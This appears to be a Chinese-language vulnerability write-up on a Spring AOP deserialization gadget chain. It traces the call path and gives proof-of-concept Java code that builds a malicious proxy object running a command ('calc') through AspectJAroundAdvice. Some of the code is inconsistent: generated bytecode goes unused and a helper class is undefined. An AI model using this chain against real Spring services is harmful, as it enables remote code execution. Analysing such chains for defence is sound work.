Spring AOP 反序列化漏洞分析与利用<\/h1>

前言<\/h2>
本文详细分析Spring AOP框架中存在的一个反序列化漏洞链，该漏洞依赖于Spring-AOP和aspectjweaver两个包，但值得注意的是spring-boot-starter-aop已经自带了这两个依赖。这个漏洞链的危害性较大，因为其依赖较少且广泛存在于Spring应用中。<\/p>

漏洞终点分析<\/h2>
漏洞的终点位于org.springframework.aop.aspectj.AbstractAspectJAdvice<\/code>类，该类实现了Serializable<\/code>接口，使其能够参与反序列化过程。<\/p>
关键污点函数是AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs<\/code>方法，该方法实现了反射调用：<\/p>
protected<\/span> Object invokeAdviceMethodWithGivenArgs<\/span>(<\/span>Object[]<\/span> args)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>    Object[]<\/span> actualArgs =<\/span> args;<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>aspectJAdviceMethod<\/span>.<\/span>getParameterTypes<\/span>().<\/span>length<\/span> ==<\/span> 0<\/span>)<\/span> {<\/span>
<\/span><\/span>        actualArgs =<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        ReflectionUtils.<\/span>makeAccessible<\/span>(<\/span>this<\/span>.<\/span>aspectJAdviceMethod<\/span>);<\/span>
<\/span><\/span>        return<\/span> this<\/span>.<\/span>aspectJAdviceMethod<\/span>.<\/span>invoke<\/span>(<\/span>this<\/span>.<\/span>aspectInstanceFactory<\/span>.<\/span>getAspectInstance<\/span>(),<\/span> actualArgs);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    catch<\/span> (<\/span>IllegalArgumentException ex)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> AopInvocationException(<\/span>"Mismatch on arguments to advice method ["<\/span> +<\/span>
<\/span><\/span>                this<\/span>.<\/span>aspectJAdviceMethod<\/span> +<\/span> "]; pointcut expression ["<\/span> +<\/span>
<\/span><\/span>                this<\/span>.<\/span>pointcut<\/span>.<\/span>getExpression<\/span>()<\/span> +<\/span> "]"<\/span>,<\/span> ex);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    catch<\/span> (<\/span>InvocationTargetException ex)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> ex.<\/span>getTargetException<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>AbstractAspectJAdvice<\/code>的几个子类会调用这个污点方法：<\/p>

AspectJAroundAdvice<\/code><\/li>
AspectJAfterThrowingAdvice<\/code><\/li>
AspectJAroundAdvice<\/code><\/li>
<\/ul>
这些子类通过invoke<\/code>方法间接调用invokeAdviceMethod<\/code>方法。<\/p>
链中间关键部分<\/h2>
在org.springframework.aop.framework.ReflectiveMethodInvocation<\/code>类中，proceed<\/code>方法会调用invoke<\/code>方法：<\/p>
public<\/span> Object proceed<\/span>()<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>currentInterceptorIndex<\/span> ==<\/span> this<\/span>.<\/span>interceptorsAndDynamicMethodMatchers<\/span>.<\/span>size<\/span>()<\/span> -<\/span> 1<\/span>)<\/span> {<\/span>
<\/span><\/span>        return<\/span> invokeJoinpoint();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    Object interceptorOrInterceptionAdvice =<\/span>
<\/span><\/span>            this<\/span>.<\/span>interceptorsAndDynamicMethodMatchers<\/span>.<\/span>get<\/span>(++<\/span>this<\/span>.<\/span>currentInterceptorIndex<\/span>);<\/span>
<\/span><\/span>    if<\/span> (<\/span>interceptorOrInterceptionAdvice instanceof<\/span> InterceptorAndDynamicMethodMatcher)<\/span> {<\/span>
<\/span><\/span>        \/\/ 省略...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    else<\/span> {<\/span>
<\/span><\/span>        return<\/span> ((<\/span>MethodInterceptor)<\/span> interceptorOrInterceptionAdvice)<\/span>
<\/span><\/span>                .<\/span>invoke<\/span>(<\/span>this<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键点分析：<\/p>

interceptorOrInterceptionAdvice<\/code>是从interceptorsAndDynamicMethodMatchers<\/code>列表中获取的，这个列表可以被序列化控制<\/li>
currentInterceptorIndex<\/code>是int类型，也可控<\/li>
我们需要让interceptorOrInterceptionAdvice<\/code>是AspectJAroundAdvice<\/code>类型，这样会触发invoke<\/code>调用<\/li>
<\/ol>
反序列化入口<\/h2>
ReflectiveMethodInvocation<\/code>本身没有实现Serializable<\/code>接口，需要通过动态代理来创建。在org.springframework.aop.framework.JdkDynamicAopProxy#invoke<\/code>方法中：<\/p>
public<\/span> Object invoke<\/span>(<\/span>Object proxy,<\/span> Method method,<\/span> Object[]<\/span> args)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>    \/\/ 省略...
<\/span><\/span><\/span><\/span>    List<<\/span>Object><\/span> chain =<\/span> this<\/span>.<\/span>advised<\/span>.<\/span>getInterceptorsAndDynamicInterceptionAdvice<\/span>(<\/span>method,<\/span> targetClass);<\/span>
<\/span><\/span>    \/\/ 创建ReflectiveMethodInvocation并调用proceed
<\/span><\/span><\/span><\/span>    invocation =<\/span> new<\/span> ReflectiveMethodInvocation(<\/span>proxy,<\/span> target,<\/span> method,<\/span> args,<\/span> targetClass,<\/span> chain);<\/span>
<\/span><\/span>    retVal =<\/span> invocation.<\/span>proceed<\/span>();<\/span>
<\/span><\/span>    \/\/ 省略...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>这里的关键是如何控制chain<\/code>变量为我们想要的类（AspectJAroundAdvice<\/code>）。<\/p>
chain<\/code>的来源有两种：<\/p>

从methodCache<\/code>获取 - 不可行，因为加了transient<\/code>修饰符<\/li>
从getInterceptorsAndDynamicInterceptionAdvice<\/code>方法获取<\/li>
<\/ol>
getInterceptorsAndDynamicInterceptionAdvice<\/code>方法最终返回interceptorList<\/code>对象，其元素通过registry.getInterceptors(advisor)<\/code>获取，而registry<\/code>是GlobalAdvisorAdapterRegistry.getInstance()<\/code>获取的单例。<\/p>
关键类org.springframework.aop.framework.adapter.DefaultAdvisorAdapterRegistry#getInterceptors<\/code>：<\/p>
public<\/span> MethodInterceptor[]<\/span> getInterceptors<\/span>(<\/span>Advisor advisor)<\/span> throws<\/span> UnknownAdviceTypeException {<\/span>
<\/span><\/span>    List<<\/span>MethodInterceptor><\/span> interceptors =<\/span> new<\/span> ArrayList<>(<\/span>3<\/span>);<\/span>
<\/span><\/span>    Advice advice =<\/span> advisor.<\/span>getAdvice<\/span>();<\/span>
<\/span><\/span>    if<\/span> (<\/span>advice instanceof<\/span> MethodInterceptor)<\/span> {<\/span>
<\/span><\/span>        interceptors.<\/span>add<\/span>((<\/span>MethodInterceptor)<\/span> advice);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    for<\/span> (<\/span>AdvisorAdapter adapter :<\/span> this<\/span>.<\/span>adapters<\/span>)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>adapter.<\/span>supportsAdvice<\/span>(<\/span>advice))<\/span> {<\/span>
<\/span><\/span>            interceptors.<\/span>add<\/span>(<\/span>adapter.<\/span>getInterceptor<\/span>(<\/span>advisor));<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    if<\/span> (<\/span>interceptors.<\/span>isEmpty<\/span>())<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> UnknownAdviceTypeException(<\/span>advisor.<\/span>getAdvice<\/span>());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> interceptors.<\/span>toArray<\/span>(<\/span>new<\/span> MethodInterceptor[<\/span>0<\/span>]);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞利用链整体流程<\/h2>

通过动态代理创建JdkDynamicAopProxy<\/code>实例<\/li>
触发JdkDynamicAopProxy.invoke<\/code>方法<\/li>
创建ReflectiveMethodInvocation<\/code>实例并调用proceed<\/code><\/li>
proceed<\/code>方法调用AspectJAroundAdvice.invoke<\/code><\/li>
invoke<\/code>调用invokeAdviceMethod<\/code><\/li>
最终执行恶意字节码<\/li>
<\/ol>
POC构造关键点<\/h2>
1. 构造AspectJAroundAdvice<\/h3>
private<\/span> static<\/span> AspectJAroundAdvice getAspectJAroundAdvice<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 生成执行命令的字节码
<\/span><\/span><\/span><\/span>    ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>    CtClass ctClass =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"AspectJAdvice"<\/span>);<\/span>
<\/span><\/span>    CtMethod ctMethod =<\/span> CtNewMethod.<\/span>make<\/span>(<\/span>"public void advice() { "<\/span> +<\/span>
<\/span><\/span>            "try { Runtime.getRuntime().exec(\"calc\"); } catch (Exception e) {} }"<\/span>,<\/span> ctClass);<\/span>
<\/span><\/span>    ctClass.<\/span>addMethod<\/span>(<\/span>ctMethod);<\/span>
<\/span><\/span>    byte<\/span>[]<\/span> bytes =<\/span> ctClass.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建AspectInstanceFactory
<\/span><\/span><\/span><\/span>    SingletonAspectInstanceFactory aspectInstanceFactory =<\/span> 
<\/span><\/span>            new<\/span> SingletonAspectInstanceFactory(<\/span>new<\/span> EvilAspect());<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建AspectJAroundAdvice
<\/span><\/span><\/span><\/span>    AspectJAroundAdvice advice =<\/span> new<\/span> AspectJAroundAdvice(<\/span>
<\/span><\/span>            EvilAspect.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"advice"<\/span>),<\/span> 
<\/span><\/span>            new<\/span> AspectJExpressionPointcut(),<\/span> 
<\/span><\/span>            aspectInstanceFactory);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 反射修改必要属性
<\/span><\/span><\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>advice,<\/span> "aspectJAdviceMethod"<\/span>,<\/span> 
<\/span><\/span>            EvilAspect.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"advice"<\/span>));<\/span>
<\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>advice,<\/span> "declarationOrder"<\/span>,<\/span> -<\/span>1<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    return<\/span> advice;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 构造动态代理对象<\/h3>
public<\/span> static<\/span> Object getObject<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 获取恶意AspectJAroundAdvice
<\/span><\/span><\/span><\/span>    AspectJAroundAdvice advice =<\/span> getAspectJAroundAdvice();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建AdvisedSupport实例
<\/span><\/span><\/span><\/span>    AdvisedSupport advisedSupport =<\/span> new<\/span> AdvisedSupport();<\/span>
<\/span><\/span>    advisedSupport.<\/span>setTarget<\/span>(<\/span>new<\/span> Object());<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建包含恶意advice的Advisor
<\/span><\/span><\/span><\/span>    DefaultPointcutAdvisor advisor =<\/span> new<\/span> DefaultPointcutAdvisor();<\/span>
<\/span><\/span>    advisor.<\/span>setAdvice<\/span>(<\/span>advice);<\/span>
<\/span><\/span>    advisedSupport.<\/span>addAdvisor<\/span>(<\/span>advisor);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建动态代理
<\/span><\/span><\/span><\/span>    JdkDynamicAopProxy jdkDynamicAopProxy =<\/span> new<\/span> JdkDynamicAopProxy(<\/span>advisedSupport);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 再套一层代理，用于触发toString
<\/span><\/span><\/span><\/span>    CompositeInvocationHandlerImpl handler =<\/span> new<\/span> CompositeInvocationHandlerImpl();<\/span>
<\/span><\/span>    handler.<\/span>addHandler<\/span>(<\/span>Advice.<\/span>class<\/span>,<\/span> jdkDynamicAopProxy);<\/span>
<\/span><\/span>    handler.<\/span>addHandler<\/span>(<\/span>MethodInterceptor.<\/span>class<\/span>,<\/span> jdkDynamicAopProxy);<\/span>
<\/span><\/span>    
<\/span><\/span>    return<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>            ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span>Advice.<\/span>class<\/span>,<\/span> MethodInterceptor.<\/span>class<\/span>},<\/span> 
<\/span><\/span>            handler);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>优化后的POC<\/h2>
通过分析，可以简化部分反射操作：<\/p>
private<\/span> static<\/span> AspectJAroundAdvice getOptimizedAspectJAroundAdvice<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 生成恶意字节码...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/\/ 直接通过构造函数设置declarationOrder为-1
<\/span><\/span><\/span><\/span>    AspectJAroundAdvice advice =<\/span> new<\/span> AspectJAroundAdvice(<\/span>
<\/span><\/span>            EvilAspect.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"advice"<\/span>),<\/span> 
<\/span><\/span>            new<\/span> AspectJExpressionPointcut(),<\/span> 
<\/span><\/span>            new<\/span> SingletonAspectInstanceFactory(<\/span>new<\/span> EvilAspect()));<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 只需要设置aspectJAdviceMethod
<\/span><\/span><\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>advice,<\/span> "aspectJAdviceMethod"<\/span>,<\/span> 
<\/span><\/span>            EvilAspect.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"advice"<\/span>));<\/span>
<\/span><\/span>    
<\/span><\/span>    return<\/span> advice;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>总结<\/h2>
这个Spring AOP反序列化漏洞链具有以下特点：<\/p>

依赖较少，仅需spring-aop和aspectjweaver<\/li>
利用动态代理和反射机制实现攻击<\/li>
最终可以执行任意命令<\/li>
在Spring Boot应用中广泛存在<\/li>
<\/ol>
防御措施：<\/p>

升级Spring框架到安全版本<\/li>
对反序列化操作进行严格限制<\/li>
使用安全工具检测应用中是否存在相关依赖<\/li>
<\/ol>